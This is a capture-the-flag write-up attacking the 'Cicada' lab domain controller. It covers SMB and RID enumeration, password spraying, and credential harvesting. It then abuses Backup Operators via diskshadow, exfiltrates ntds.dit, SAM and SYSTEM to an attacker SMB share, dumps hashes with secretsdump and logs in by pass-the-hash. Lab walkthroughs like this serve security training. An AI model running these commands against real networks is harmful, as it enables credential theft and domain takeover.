Enumeration

As usual, we start off with an nmap scan to get a listing of open ports and running services:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 08:13:03Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3268/tcp open  ldap
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

We get back a typical result for a Windows machine including SMB, WinRM, some LDAP ports and even Kerberos. It’s highly likely, a Domain Controller for the cicada.htb domain.

SMB is lowest hanging fruit for enumerating some goodies so we can use netexec to get a good look at the SMB shares for example:

netexec smb $target -u 'anyone' -p '' --shares --smb-timeout 60

I had to add the SMB timeout because the box is not very performant and the requests would time out without it.

We get back the typical Windows shares plus a readable HR share. We can use smbclient to interact with the service and see what we can read:

smbclient //$target/HR -U 'anyone'

Password for [WORKGROUP\anyone]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 23:29:09 2024
  ..                                  D        0  Thu Mar 14 23:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 03:31:48 2024

		4168447 blocks of size 4096. 341446 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit

Inside the notice text document, we can see some information regarding changing default credentials for new employees. This is our likely attack path if we can enumerate some users for the machine.

First thing to try is a rid-brute using the best Active Directory tool on the planet, netexec:

netexec smb $target -u 'anyone' -p '' --rid-brute --smb-timeout 60

This gives us a list of users we can use and test the default password against:

john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

We can then check who hasn’t changed their password, again with netexec:

netexec ldap $target -u users.lst -p '<redacted>' --continue-on-success

We see that the user michael.wrightson still has not changed the default password. He has read access to NETLOGON and SYSVOL file shares, so just a little bit more access than a normal user.

Using rpcclient with these new credentials allows us to find david.orelious credentials.

rpcclient -U 'cicada.htb/michael.wrightson' $target
rpcclient $> querydispinfo

It seems he has been a bad boi admin and left his credentials in his account description thinking it was safe there. Michael is an idiot.

michael.orelious has access to the Dev share where there is a .ps1 script called Backup_script. This script acts on behalf of the emily.oscars user by creating a PSCredential object. We can take the clear text credential and see what emily.oscars has access to.

This user has access to the machine via WinRM:

evil-winrm -i $target -u 'emily.oscars' -p '<redacted>'

Privilege Escalation

As the emily.oscars user, we can run whoami /all and see that we are a member of the Backup Operators group.

It’s really simple to get privilege escalation while being in this privileged group. Firstly, create a disk shadow script (backup.dsh):

set context persistent nowriters
add volume c: alias bak
create
expose %bak% z:

What this does is effectively mounting a readable copy of the C: as the Z:. As a member of the Backup Operators group, we can run diskshadow.exe which allows us to pass this as a script. We need to be in a writable directory to do so.

Lets do this:

cd C:\
mkdir Temp
cd Temp
Invoke-WebRequest -Uri http://<your_ip>/backup.dsh -OutFile backup.dsh

This gets us into a situation where we can run the disk shadow process and expose the file we want to get access to which is the ntds.dit file. We run:

diskshadow.exe /s backup.dsh

Then to copy the file to our location:

robocopy /B Z:\Windows\NTDS .\ntds ntds.dit

Next, we need to registry hives, the SYSTEM and SAM hives:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save

Back on our attack host, we can stand up an SMB server to exfiltrate the files to.

mkdir smb && smbserver.py -smb2support share ./smb

On the target, we copy all the files back to our host:

copy sam.save \\10.10.14.82\share
copy system.save \\10.10.14.82\share
copy ./ntds/ntds.dit \\10.10.14.82\share

To get all the secret goodies from the host exfiltrated data, we use another brilliant impacket script called secretsdump.py:

secretsdump.py -sam sam.save -system system.save -ntds ntds.dit LOCAL

Using the NTLM hash gained for the Administrator user, we can then use WinRM to log back into the DC as the Administrator thereby fully compromising the host and the cicada.htb domain.

evil-winrm -i $target -u 'Administrator' -H '<redacted>'